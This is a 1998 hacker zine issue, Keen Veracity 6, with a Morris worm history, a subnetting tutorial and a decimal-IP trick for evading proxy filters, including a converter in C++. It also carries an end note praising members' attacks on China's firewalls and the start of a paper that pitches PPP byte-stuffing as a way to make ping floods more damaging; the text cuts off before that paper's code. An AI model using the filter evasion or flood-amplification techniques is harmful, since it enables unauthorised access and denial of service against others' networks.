Copy Link
Add to Bookmark
Report
Keen Veracity Issue 06
____ __.
| |/ _|____ ____ ____
| <_/ __ \_/ __ \ / \
| | \ ___/\ ___/| | \
|____|__ \___ >\___ >___| /
\/ \/ \/ \/
____ ____ .__ __
\ \ / /________________ ____ |__|/ |_ ___.__.
\ Y // __ \_ __ \__ \ _/ ___\| \ __< | |
\ /\ ___/| | \// __ \\ \___| || | \___ |
\___/ \___ >__| (____ /\___ >__||__| / ____|
\/ \/ \/ \/
|--------Issue #6 December 1998----------|
Legions of the Underground
|-----------www.legions.org--------------|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*---The Legions Staff---*
optiklenz - The man with the circuit board boxers
icer - is in search of Terabyte ethernet nirvana.
aphex -"I love rules, I think they're wicked"
lasik - " that's not an ATARI 2600 is it!?"
cap n crunch - "knows how to whistle"
sreality - "the original code pimp - betta' act like you know, bitch ;)"
HyperLogik/m0f0 Contact your local netherlands phone operator
Zyklon - taking over the world with a 8086 and a 300 baud modem
tip - brings his ALTAIR to nudy bars
[havoc] -
kM - kM- uses tape feeds to pimp his ho like a TX-0
defiant - "wheres my pay"
Duncan Silver-
DigiEbola - Of course I'm drunk, I ain't no stunt driver.
flemming - "not with that burnt out peice of shit"
Bronc Buster - the keyboard cowboy
lothos - "The Doctor is IN"
mercs -
NetJammer -
dethl0k -coded a loop in his tie
NtWakO/NeatHack -Bugs in NT? Your shitting me....
Mnemonic -
zortin8r -"wha?"
King BonG -
IsolationX -
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[01X10] Introduction Digital Ebola
[02X10] Letters to Editor The Readers
[03X10] The Morris Internet Worm Defiant
[04x10] Setting Up Subnets m0f0
[05X10] Defunct Internet Protocol [DIP Security] Optiklenz
[06X10] Exploiting PPP Frame Byte-Stuffing Noc-Wage
[07X10] NT Security- Tips & Techniques Neathack
[08X10] Rootfest `99 Details Defiant/Lothos
[09X10] Revamped bootp Exploit Bronc Buster
[10X10] In the News sources
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Introduction Digital Ebola
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Welcome to another wholesome edition of Keen Veracity. As I sit
here, in my cozy little corner of cyberspace, I am wondering where to base
this weeks editorial. And it came to me, the art of thinking. More to the
point of creative thought. Much of what consists of the computer industry,
and hacking in general is free thought. As a computer cannot code itself,
sometimes the human mind is at a segfault. What runs through the minds of
the people on the cutting edge of the field? Lunacy? Will? Or plain desire?
To hack the machine, you have to hack yourself. Inspiration, in any case is
needed. We may get it through a book, a action or even history itself.
Who knows, yes even Keen Veracity! The whole point to this ramble is, that
sometimes its hard to find the inspiration, and the ideas to make the
cutting edge things happen. We read, we poke at keys with the tunes at
190db, goto conventions (check out the RootFest 99 article) and we converse
among our peers in strange mediums and the ideas flow. This I believe, is
our purpose, and it is a good one. If we do anything in the world, let's
provoke someone into having a good idea and to act on it.
This week, I am pleased to announce that our site www.legions.org is back
up, and running. You are sure to see many improvements as it will continue
to be improved upon. Also, we are gearing up for Rootfest 99, in May.
The Legions crew will be out in effect, with t-shirts, and hardcopies of
Keen Veracity, which is now not only avaliable in text, tar, zip, and
prc formats, but in paperback, complete with a kickin cover and a included
diskette with the code we feature here. In addition to our table, Optiklenz
will be speaking over Cisco security and encryption. This convention is
sure to be a blast, and a good chance to compare notes, and meet the Legions
crew. For more information, see Lothos's article below, or check out
www.rootfest.org.
That looks like the end of my rant for the week. If you would like to
submit a article, or become a official KV Distro Site, please email
digi@wintermute.linux.tc Happy reading!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Letters to the Editor The Readers
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Subject: Novell article in Keen Veracity 5
This was an excellent article, which covered the subject of security in
Novell very well.
I have one error to draw your attention to though.
In the intro Ntwak0 states:
"First Simple Rule Upgrade to NetWare 4.x this will defeat many of the
attacks", this is ONLY true if the sys admin has not checked the box to
run in bindery mode. This is an emulation system NetWare runs to allow
communication between mixed NW3.x and NW4.x servers. If this is enabled,
90% of 3.x attacks will still work on a 4.x server environment.
otherwise an excellent article.
Max the Silent
If you wish to have a list of exploits that still run on 4.x (whatever
the bindery mode says) mail me.
( Yah, looks like we got some of that thought thing goin on :P )
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Morris Internet Worm - Historial Information Defiant
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- [ The Morris Internet Worm ] -
by
- [ Defiant <defiant@wintermute.linux.tc> ] -
- [ http://wintermute.linux.tc/~defiant ] -
----[ i n t r o d u c t i o n ]
This is something I intended to do a while ago, well actually nearly a
month so that it came out around 10 years after the internet worm was
released, but as usual, things go wrong and its over a month late, my
apologises. Anyway. What I aim to do is described what happened that day
and also described the worm and what it did and some history of the worm
and all things connected.
----[ w h a t w a s i t ? ]
Even today there is some confusion as to what the worm was. Some people
still call it a virus but for many reasons this is not true.
The main difference between the worm and a normal virus is the way it
reproduces and spreads. When a normal computer virus enters a system,
usually via an infected disk or file downloaded from the internet, it
infects a system file and also a file that will be used sometime in the
near future. The alteration to this file usually is the addition of the
commands to active the virus.
Now, lets see for these two examples how the worm was different.
First of all, a worm doesn't need to be spread via a disk of infected file,
it breaks into computers via exploits, such as statd or named, although,
these bugs wern't around then. When the virus has broken in it will launch
another program, which will scan the internet for more hosts it can gain
entry to. At no time does it require a user to launch the program or send
it to someone, it acts independently, some may call this AI (artificial
intelligence), although in a very basic form. All computers attatched to
the internet could be potential targets to the worm, unlike a virus, where
it would be those that were accidently infected.
----[ h i s t o r y of w o r m s ]
When the Internet Worm was released in 1988 it was by no means the firt of
its kind, nor was it the last. The name of the worm comes from a book
called The Shockwave Rider written by John Brunner in 1975. In short, the
story is about a totalitarian government that controls its citizens through a
powerful computer network. A freedom fighter infests this network with a
program called a "tapeworm" forcing the government to shut down the
network, thereby destroy its base of power. Between this book and the 1988
Morris Internet Worm, it is no wonder that worms got a bad name. The truth
of the matter is the first worms were actually designed to facilitate
better network usage.
<1971>
In 1971 the first program that could reasonably be called a worm was
written by Bob Thomas. This was a program for Air Traffic Controlers to
notify them when an plane moved from one computer to another. The program,
called Creeper, only moved from one screen to another displaying the
message "I'm creeper! Catch me if you can!", it NEVER reproduced itself.
After this idea several programmers tried the idea out to perform tasks
but within a few months the idea died out.
<1980>
In the early 1980's, John Shock and Jon Hepps of Xerox's Palo Alto
Research Center began experimenting with worm programs. This was in fact
the first time the term worm had been applied to this sort of code. They
developed 5 worms between them, each of which was used to perform a
specific helpful task around the network. Some of these were quite simple
such as the Town Crier which traveled around the network posting
announcements, and some were complex, such as The Vampire, which would be
idle during the day, but during the night, when CPU usage was low, it would
take advantage of this and use it, then at dawn, it would save its work and
wait until night again. These worms were very useful until one night one of
Xerox's worms malfunctioned and when people turned up to work the next day
they found all their machines crashed. Making this problem even worse, when
people restarted their machines, they found the malfunctioned worm
continued to crash their systems. It was at this point when an vaccine had
to be written, when it became apparent that worms could be dangerous and
cause problems. After this minor disaster worm research dropped out of the
public eye until 1988 when Morris' worm thrust it back into the spotlight.
Morris' worm was frontpage news in most of the papers and it was currently
US election time, so it was pretty impressive, and people all over the
world were infected with the worm and experiencing problems. Since Morris'
worm, no worm has been able to replicate the shock value, however there
have been worms since then. In 1989 another worm was released, this one
very destructive, but didn't cause as many problems. The following is what
this worm did....
It attempts to gain system privileges. If it succeeds:
It turns off mail to the SYSTEM accounts,
It alters the system login command to make it APPEAR that all a user's
file has been deleted.
It alters the announcement message to display a message of its own choosing.
Even if it fails to infect a system account:
It transmits its location (thus indicating that the system it is on has a
security hole)
It harasses users by using the PHONE function to ring them
It records user passwords that are found to be simple, such as the null
string and the user's username.
There are still worms around today in the late 90's, but none have ever
caused as many problems. The most recent I can think of would be ADMw0rm.
Just because they haven't been reported though, doesn't mean that they
don't exist. We all learn from mistakes, and because of the mistakes
Morris made, and also learning that destructive worms don't help, people
would be able to make more efficient worms that could go almost undetected,
however, it is unlikely.
----[ e f f e c t s ]
Before I state what Morris's Internet Worm did do, it may be easier to
state what it didn't do.
- The worm didn't alter or destroy files
- The worm didn't save or transmit the passwords which it cracked
- The worm didn't make special attempts to gain root or superuser access
in a system (and didn't utilize the privileges if it managed to get them).
- The worm didn't place copies of itself or other programs into memory to
be executed at a later time. (Such programs are commonly referred to as
timebombs.)
- The worm didn't attack machines other than Sun 3 systems and VAX
computers running 4 BSD Unix (or equivalent).
- The worm didn't attack machines that were not attached to the internet.
(In other words, no computers that didn't have an internet address were
attacked. Modems do not count as internet connectors in this respect.)
- The worm didn't travel from machine to machine via disk.
- The worm didn't cause physical damage to computer systems.
With all of this out of the way, you are probebly wondering what did the
worm do. It wasn't there for someone to gain access into thousands of
computers, or cause mass destruction. From the decompiled versions of the
worm it appears to do nothing, well nothing obvious anyway. The worm was
designed simply to spread as far as possible and infect as much as possible.
Maybe it was just a test that Morris ran before he finished the worm to
do something more sinister, we will probebly never know. However, further
to add to the theory that this was a test, is that the code was far from
perfect. Apparently at the time the worm was released, it contained
numberous bugs and also the programmer had greatly underestimated the
effects the worm would have. One of the bugs that was in this was the fact
that once a worm infected a host, it may reinfect many times, thus being a
DoS attack. this seemingly untraceable process, soon reinfected the same
machines and caused it to crash. This is an extract from the book, "A Tour
Of The Worm" by Donn Seely, explaining this problem.
All the following events occurred on the evening of Nov. 2, 1988.
6:00 PM At about this time the Worm is launched.
8:49 PM The Worm infects a VAX 8600 at the University of Utah
(cs.utah.edu)
9:09 PM The Worm initiates the first of its attacks to infect other
computers from the infected VAX.
9:21 PM The load average on the system reaches 5. (Load average is a
measure of how hard the computer system is working. At 9:30 at night,
the load average of the VAX was usually 1. Any load average higher than
5 causes delays in data processing.)
9:41 PM The load average reaches 7
10:01 PM The load average reaches 16
10:06 PM At this point there are so many worms infecting the system that
no new processes can be started. No users can use the system anymore.
10:20 PM The system administrator kills off the worms
10:41 PM The system is reinfected and the load average reaches 27
10:49 PM The system administrator shuts down the system. The system is
subsequently restarted
11:21 PM Reinfestation causes the load average to reach 37.
In short, in under 90 miniutes after infection, the system was unusable,
and there was great costs due to loss of service and time spent trying to
fix the problems the worm caused. Between $100,000 and $10,000,000 were
lost due to lost access to the internet at an infected host, according to
the United States General Accounting Office.
----[ t h e r o u t e ]
This is the "route" the worm took once it had infected a system.
1 - First it would change its process name to "sh" in order to mask its
process name. This is quite obviously the Bourne Again Shell, a common
shell enviroment for UNIX systems.
2 - The worm's creator didn't want the worm to be easy to capture, since
once someone captured a copy of the running worm, it would be possible to
deconstruct the code and figure out how to stop it. To this end, the next
thing the Worm does is set the maximum core dump size to zero bytes. A
"core dump" places a copy of the CPU's running process into memory for
further examination. A core dump occurs whenever a program crashes, but
can also be forced. Since the worm set the size of the core dump to 0,
even if the program crashed, or was forced to crash, investigators would
not get a copy of the running worm.
3 - The worm also reads the current time at this point and stores this for
seeding the random number generator. This will be used later.
4 - Additionally, when the Worm was executed, it might have been executed
with the -p flag, an optional command line argument, followed by a decimal
number which was believed to the the process identification number of the
current worm's parent.
5 - The rest of the command line arguments that the Worm was executed with
are the names of the object files that it needs in order to operate at
full capacity. The worm tries to load the files named by these arguments
into its address space. If the -p argument was given above, then it also
deletes these files after loading them, and later deletes the disk copy of
the running worm itself. It also tries to delete the file /tmp/.dumb,
although, since this file is never referred to again, it is unclear
why it does so. If it fails to load any one of these object files, the
worm quits. Otherwise, the worm continues.
6 - The Worm checks to make sure that it had at least 1 object file in its
command line. If it didn't, it quits.
7 - The Worm then checks to see that it has successfully loaded the file
l1.c. This is the file that the Worm will use later to infect other systems
If this file was not loaded, the Worm quits.
8 - The Worm then erases the text of the argument array to further hide
any evidence of it's presence.
9 - The Worm then scans the network interfaces of the machine it is on,
getting the flags and addresses of each interface. If it cannot find any
interfaces, the Worm quits. It also loads the network mask which allows the
Worm to determine what internet address are used by the local network.
10- The Worm then kills the process given in the -p option (probably the
process that created this copy of the worm), changing the current process
group to avoid killing itself.
At this point, the initializations are complete and the worm calls the
central routine of the worm.
11- Using a random number (seeded by the current time), the Worm then
determines whether or not to check for itself. There is a one in seven
chance that it will not; otherwise, the Worm checks itself.
12- If the Worm does not check for itself, it will go ahead and continue.
This one in seven chance was originally added to make the Worm more
difficult to kill; ironically, it worked in the sense that this addition
is why the Worm spread so quickly. In addition, only the first copy of the
Worm on any one machine would check for itself; all subsequent copies
skip the test entirely.
13- There is also a procedure that was supposed to send one byte to the
address 128.32.137.13 (ernie.berkeley.edu), port 11357; this did not work,
though, since the program used the TCP command sendto, instead of a UDP
datagram. Since the program never initiated a connection with the
aforementioned port, the TCP command failed with a "socket not connected"
error. This random (one in fifteen) byte appeared to be for monitoring the
overall progress of the Worm on the net. If the worm had been devloped
further, like many people think it would of after the origional version if
it had worked as intended, could have been to say that a host had been
backdoored etc, but the worm never had such a function in it.
After this, the Worm proceeds to the primary loop of the program. This
infinite loop calls all of the major procedures in the following order:
14- Cracksome, the routine which searches for hosts that the Worm can
break into;
15- The Worm then runs other_sleep for thirty seconds;
16- The Worm then runs Cracksome again;
17- The Worm then forks into two child processes and kills the parent
process. The child has all of the information that the parent had; in
addition, the child has a new process number, making the worm difficult
to hunt down. The Worm then runs through the infect process again;
18- Then the Worm runs other_sleep for 120 seconds;
19- Before looping back on itself, the Worm checks to see how long it has
been running. If it has run for over 12 hours, it cleans up some of the
host list entries.
The Worm loops through this procedure until it is told to quit by another
worm or is killed.
----[ m o r r i s ]
In case you were wondering what happened to Morris because of his actions
I will tell you. He was convicted of a Federal felony in the case. The law
involved was 18 USC 1030 (A)(5)(a), the Computer Crime and Abuse Act of
1986. He was found guilty in February of 1990 in US District Court in
Syracuse, NY. In May of 1990, he was sentenced -- outside of Federal
sentencing guidelines -- to 3 years of probation, 400 hours of community
service, and $10,050 in fines plus probation costs. His lawyers appealed
the conviction to the Circuit Court of Appeals, and the conviction was
upheld. His lawyers then appealed to the Supreme Court, but the Court
declined to hear the case -- leaving the conviction intact. For a while,
Robert was (allegedly) working as a programmer (non-security related) for
CenterLine Software (makers of CodeCenter, et. al.). More recently, Robert
has been working on his Ph.D. under the direction of H.T. Kung at Harvard
University. He is also involved with the ViaWeb company. To the best of my
knowledge, he has not spoken publicly about the incident, nor has he
attempted to work in computer security.
----[ w r a p u p ]
Well, thats pretty much some basic information on the worm and related
things. I want to thank everyone out there that has a site with information
on it about the worm, as I took information from so many I cannot accuratly
credit these people for their information. if by any chance you see
something that you think you should be credited for please mail me and let
me know and I will give you the credit you deserve.
-Defiant
defiant@wintermute.linux.tc
http://wintermute.linux.tc/~defiant
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Setting Up Subnets m0f0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Subnets are logical subsections of a single TCP/IP network. For
administrative or technical reasons, many organizations choose to divide
one network into several subnets. Routing can get very complicated as the
number of networks grows. For example, a small organization might give
each local network a Class C number. As the organization grows,
administering network numbers may get out of hand. A better idea is to
allocate a few Class B network numbers for each major division in a
company: one for engineering, one for operations, and so on. Then, divide
each Class B network into physical networks using subnets. In this way,
you can isolate hosts from changes you might make to the network in remote
parts of the organization.
Subnets allow you more flexibility when assigning network addresses. The
Internet Protocol allows 127 Class A networks with 24-bit host fields;
16,383 Class B networks with 16-bit host fields; and over two million
Class C networks with 8-bit host fields.
-Network Masks-
Typically, you create subnets by using a subnetting scheme called the
"address mask." When setting up your network, you should select a
network-wide "network mask". A network mask determines which bits in the
IP address will represent the subnet number. The remaining bits represent
the host within the subnet. For example, you could configure an
organization's internetwork as a Class B network. Then you could assign
each local subnet a subnet number within that network. The 16 bits could
be allocated as 8 for subnet and 8 for host, or 9 for subnet and 7 for host,
and so on. Your decision would be transparent to everyone outside that
organization.
You can express network masks as a single hexadecimal number, or as four
octets of decimal numbers. The default is a mask of 0xFF000000
(255.0.0.0) for Class A networks, 0xFFFF0000 (255.255.0.0) for Class B
networks, and 0xFFFFFF00 (255.255.255.0) for Class C networks. You only
have to specify network masks explicitly when they are wider (that is,
have more one-bits) than the default values. One common case is a Class
C mask on a Class B network. A Class B network provides you with 256
possible subnets, each one of which can accommodate 254 possible hosts
(remember, 0 and 255 are not acceptable host addresses). But you may know
that one of your subnets will ever have more than, say, 128 hosts, while
you may need more then 256 subnets. In that case, you could decide to use
nine bits for the subnet number instead of eight, and seven for the host
addresses. The appropriate mask for this would be 0xFFFFFF80,
or 255.255.255.128 (2 to the power of 7 is 128, and 128 subtracted from
the possible 256 is 128).
Given the above scheme, and a network address of, for instance, 131.60,
the address for the first host of the first subnet would be 131.60.0.129.
/etc/netmasks File
The /etc/netmasks file contains the default netmasks for your system. To
set up the netmask, you need to create this file. Here is a sample
/etc/netmasks.
#
# Network masks
#
# only non-standard subnet masks need to be defined here
#
# Network netmask
128.32.0.0 255.255.255.0
Create an entry with the network number and network mask on a separate
line for each network that is subnetted.
You can use ifconfig to override the network masks manually. For more
information about ifconfig, refer to the ifconfig(1M) Reference Manual
entry.
For example, consider Class B network 128.32 with an 8-bit wide subnet
field (and, therefore, an 8-bit wide host field). The /etc/netmasks entry
for this network would be
128.32.0.0 255.255.255.0
You can enter symbolic names for subnet addresses in the /etc/hosts file.
You can then use these subnet names instead of numbers as parameters to
commands. For more information about netmasks, see the netmasks(4)
Reference Manual entry.
Changing from a Nonsubnetted to a Subnetted Network
Follow these steps to change from an internetwork that does not use
subnets to one that is subnetted.
1. Decide on the new subnet topology, including considerations for
subnet routers and locations of hosts on the subnet.
2. Assign all subnet and host addresses.
3. Edit /etc/netmasks as mentioned previously.
4. Edit /etc/hosts on all hosts to change host addresses.
Examples of Subnets
The following examples show network installations where subnets are
(and are not) in use:
128.32.0.0 Berkeley Class B network (subnetted) netmask 255.255.255.0
36.0.0.0 Stanford Class A network (subnetted) netmask 255.255.0.0
10.0.0.0 Arpanet Class A network (nonsubnetted) netmask 255.0.0.0
The University of California at Berkeley is assigned the network number
128.32.0.0, so that any external router only needs to know one route to
reach Berkeley. Within the campus, a Class C subnet mask is used to give
each local network a subnet number, with 254 hosts on each of the 254
possible subnets. (Zero and all ones, that is 255, are reserved.)
Stanford University uses a Class A network number with a Class B network
mask, for 254 subnets of 65534 hosts each. The ARPANET is a Class A
network without subnets; therefore, the default Class A netmask is used.
m0f0
-----------------------------------------------------------------
*=-###############################################-=*
[*] [*]
| Defunct Internet Protocol [DIP] |
| optiklenz |
| Legions Of the Underground |
+---+*LoU*********************************LoU*+---+
*****************************************************************
The first few paragraphs of this text serve as an general outlook
for people who have no prior knowledge of the tcp/ip protocols
-----------------------------------------------------------------
Every host or computer on the internet is addressed by an IP number.
No two IP numbers are equivalent. A perfect analogy would be the
procedure of the postal service. Think of IP's as being houses
each house needs an individual identifier that is contrary
to the other.
[90150^] - House 1 [90151^] - House 2 [90153^] - House 3
Each house has a different home address so that the post office
Is able to find it and deliver mail accordingly. This goes alike
for an IP number. Each IP number is divergent from the other
which allows for data intended for a particular host to be
transferred to it's destination with out error.
The ip's network ID remains the same in all occurrences , but it's
host ID changes.
Example: 60.0.0.0 - Where 60 is the network ID
All IP addresses are 32bits long, and are comprised of four 8bit segments
known as octets The way this is addressed is using
ones, and zeros. The human mind doesn't designate numbers
as well as it does words this is the reason for domain naming.
Could you imagine if people were identified by a numeric value
rather than a name? It'd be pretty ridiculous. Picture yourself
calling out to a friend "Hey 19682842434 ?" so for
the same convenience of having a static name we have static IP's
with a logical address (127.0.0.1) or a domain name
(www.localhost.com) that interprets all the data for us.
Quick overview on Process of IP Conversion.
<*-------------------------------------*>
10000001 01100100 00001111 00000110 - IP
<*-------------------------------------*>
to
<*-------------------------------------*>
129.100.15.6 <-- decimal conversion
<*-------------------------------------*>
to
<*-------------------------------------*>
PC <-- Host Name
<*-------------------------------------*>
Protocols convert to the physical address going from PC
(Host Name) to 129.100.15.6 (decimal address).
+-=============-+
* The Process *
+-=============-+
Seeing that IP's are 32 bits in 4 8bit segments.
If you take 32 (bits of the ip) and multiply it
by 8(bits of each ip segment) you get 256 bits or
a cluster of 1's, and 0's depending on how you are
looking at it. =]
The give an example of how we go from an IP in decimal form
to a defunct ip. We'll use www.legions.org.
Resolve the domain name. In this case we have 199.227.88.145:
[segments referred to as SEG]
********************
256| 3-2-1 method...
********************
32(8) = 256
|_SEG1(199)*256^3
|
SEG2(227)*256^2_+
|
SEG3(88)*256_+
|
SEG4(145)_+
|
145_+ -= 3353565329 (new identifier)
Defunct IP: The reason I call the new identifier a defunct IP
is because when it goes through the above process it is
no longer decimal form. So I refer to
it as a "dead ip"
Security Analysis:
If you take an IP in decimal form, and convert it to a defunct IP [DIP]
services will still resolve the number as an identifier for that host
but since it no longer has any decimals separating segments it is perceived
as an Intranet host rather than its original standing as an IP. This
brings some questions of security since Intranets tend to
have very little security implementation.
Since the given locator is no longer considered an IP it is no longer
conditional to the same security restrictions imposed on a practical
host identifier. For this reason If you were obstructed from accessing
specific things from behind a proxy, using the new
identifier the security measures otherwise implemented no longer apply.
open: www.legions.org
no connection do to proxy restrictions
meaning: where as 199.227.88.145 would obtain no connection
3353565329 would process.
Also if you are being blocked from certain sites because they
might contain ActiveX, Java applets, or if you just use AOL whereby
90% of the internet is blocked out anyway the defunct ip method will
allow you to view the site with out any complications.
The reason some administrators block sites that contain java, and
Active X is because scripts on certain sites may be a security hazard
or malicious in the sense that they cause a DOS (denial of service)
or do other things which would cause otherwise keep the system from
executing what it's setup to do.
--------------------------------------------------------
The code below was written to go with this article
-------------------------------------------------------
/*
* defunct.cpp - use: Enter logical IP number. Results: Defunct Address
* Defunct IP Calculation Module-
* Legions Of the Underground - http://www.legions.org
* Code written to assist article
* written on Defunct IP's, and Security Risk in Keen Veracity 6
* optiklenz@legions.org - optiklenz
* This code may be alter'd as long as proper credit is givin
*/
#include <iostream.h>
#include <stdio.h>
#include <stdlib.h>
int ClearCin(istream& isIn) // Clears istream object
{
streambuf* sbpThis;
char szTempBuf[20];
int nCount, nRet = isIn.rdstate();
{
isIn.clear(); // Clear error flags
sbpThis = isIn.rdbuf(); // Get streambuf pointer
nCount = sbpThis->in_avail(); // Number of characters in buffer
while (nCount) // Extract them to szTempBuf
{
if (nCount > 20)
{
sbpThis->sgetn(szTempBuf, 20);
nCount -= 20;
}
else
{
sbpThis->sgetn(szTempBuf, nCount);
nCount = 0;
}
}
}
return nRet;
}
int main()
{
double result=0;
double numb[4];
char text[15];
cout << "Input the address you wish to use/modify...\n> ";
cin.getline (text, 16);
ClearCin(cin);
//Parse numbers
for (int x = 0, y = 0; !(x>3); x++)
{
char stay[3];
if (x!=3)
{
for(int z =0;text[y]!='.';y++,z++)
{
stay[z] = text[y];
}
numb[x] = atof(stay);
}
else
{
for(int z =0;text[y]!='\0';y++,z++)
{
stay[z] = text[y];
}
numb[x] = atof(stay);
}
if (x!=3)
y++;
stay[0] = '\0';
stay[1] = '\0';
stay[2] = '\0';
}
cout << numb[0] << " " << numb[1] << " " << numb[2] << " " << numb[3];
//run algorithim
result = ((numb[0])*(16777216));
result += ((numb[1])*(65536));
result += ((numb[2])*(256));
result += (numb[3]);
int dec=0, sign=0;
cout << endl << ecvt(result, 10, &dec, &sign) << flush;
return 0;
}
-----------------------------------------------------------------------------------
End Note: Recently members of Legions Of the Underground "attacked" China yet
again on their "human rights" condition. China setup firewalls in
an effort to detour the people of the Chinese Republic from viewing
sites which were found objectional by the Communist rule of China.
These firewalls were paralyzed, and reconfigured.
The group stands behind these actions 100% although the actions taken
were that alone of the members who decided to impose
action in an
conformed fashion towards China. No one should be denied the right
to view, or access data which is condignly theirs.
This article is just another method in which data that is otherwise
restricted to the end viewer is able to be discerned.
All in all remember the information is out there, and it belongs to
us. Join us in the fight to keep all data free. Keep the government(s)
from impertinently tampering with rules, and regulations that go
against our rights as inhabitants of this nation, as a society as
a PUBLIC of the U.S.A (or whatever other country)... Ban together,
and speak out in numbers before your right to speak is contraband entirely.
Areas of Interest:
link to effnet
list the wired article
list the cnn article
list the msnbc article
Article on Firewalls
list the antionline article
list the HongKong blondes article
List both
List the Human rights article
List article on firewalls
http://www.rootfest.org - Lecture on Firewall Security, and
-----------------------------------------------------------------------------------
- Steve Stakton <optiklenz@legions.org>
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGiBDR6E3wRBADHm2aiODOCowgDqXdcFvooCTrQe6tDPqznXChCO1p0t12hhQZe
0C+/xBorkJXlqOaDadmUQVZP3Kij97SOTWU1AS1SPSTzF6VAylHalGz9iUHjxa7g
SSAVrLUMngWG7hxnz7lBHFIQ8iQPjWvK5qhEQ9vcBF9ped9StPRsZlljIwCg/02Z
XXrVaJUtWAxUaAARUdPt0FsEAKyhGuQA1HgGWM/GQxpvBvmDqHkNGxM9YyrF1Dg1
PWAoNuG8GdJazj18c2AODp68NwPH0dUYTxKc4ejR//OcOfl1HRfE0thJEDpqkSyQ
2iobKGkYdmug666pe0Xr3wkgBE+rnzC3RLlUdnRAu25MuEqlc6yRWAT0YH/Pl9IB
eDRGA/4uAuFiEiyfd3Djhi7Wwh8/qiG7SChW0arEXq3RqHQqd3EaVR1FgNzCtvxg
kK2mY07XeSX2fjlWo4ynrBdl5QXbOn9X+GzDcw1z9FBVQHaY0EJMoE0fb53bTyCG
0bdCMTid1DUKhJeekW6cPZvRQlu5IjH/+FVT9S38UsAMMwwrCrQlU3RldmUgU3Rh
a3RvbiA8b3B0aWtsZW56QGxlZ2lvbnMub3JnPokASwQQEQIACwUCNHoTfAQLAwEC
AAoJEGgSVovfJxzQFfcAn0WybtLnFw9jf9agk7xUaikjEjLkAKCYfA1rx/SXP5Je
v5R0+ZVMqIGiibkCDQQ0ehN8EAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlL
OCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N
286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/
RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2O
u1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqV
DNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+OCRz2nG+
SSCrgZY2nIGz68SO+2h3weFMzdBSWQDjZ5Fa7GjRBPeTRQvectPvSqcwjeZTq8DE
1AVI/oFw1mChgfV7CgQuC+P0OK+jr6tIwyhM6gdo5NEdD7/uLWJfFi2l/AP4skVv
ydmg1KGlxjvtjOFKhOGoV2vSTPRGn1l1lCzBZPRur0xTtNwk5b54o8g/NlMEsO/p
/P6CRP4J1WlDkH66jST+ygAYNN0AtRy0eEPUxu7+dYC4OgT0xCcglCqKf7hnMGrf
s/I2MHBbhSmdtcW5pLYcEb8iwXEitGN+plAy+OZrygJ4ytFAdnL2r9NmegUPTYz0
3t4M3hiITUmiP4kAPwMFGDR6E3xoElaL3ycc0BECKBQAoKqOQNZ82RmU4rsZRM9l
a6QdQeSVAJ469y3cLO1eU5oMYpLdvSGevh0mSg==
=cpan
-----END PGP PUBLIC KEY BLOCK-----
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploiting PPP Frame Byte-Stuffing Noc-Wage
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
--------------------------------------------------------------
| Exploiting PPP frame Byte-Stuffing |
| -*- or -*- |
| How to get twice the bytes for your buck |
| Noc-Wage 12/10/98 |
--------------------------------------------------------------
Introduction:
This paper will explain how you can use PPP frame byte stuffing
to your advantage to increase the bandwidth required by the
victim but not the bandwidth of the routers in between during
a large size packet flood.
This paper isn't being produced to encourage the kiddies out
there to use Denial of Service attacks. The real reason is
to help turn weapons like ping -f into more efficient and more
selective weapons of mass destruction so that if they
are used, they will be more effective.
The basic layout of this paper will be as follows:
- Introduction (Already passed it)
- Explanation of Bandwidth Based Packet Flood Attacks
- Brief overview of a PPP HDCL frame
- Explanation of Byte Stuffing and Worst case overhead
- Conclusion
- Modified pingflood.c
--------
Explanation of Bandwidth Based Packet Flood Attacks
Bandwidth based packet floods are simply a fast succession of
large sized packets used to consume bandwidth and block
legitimate network traffic. A popular method of attack is
the classic ping -f.
This attack is the scourge of the internet. The reason is
that this attack is a "carpet bombing" based attack and can
result in much wider disruption than intended by the user.
What some of these users don't realize is that while the end
victim's connection clogs like a freeway at rush hour, the
attacker's huge amounts of traffic have to pass over many
networks and routers before it reaches it's intended victim.
This damages the speed of the internet as a whole and can
lead to entire routes being temporarily inaccessable until
the attack has ended.
What's proposed in this article is a way of lowering the
strain put on the points between but still having the same
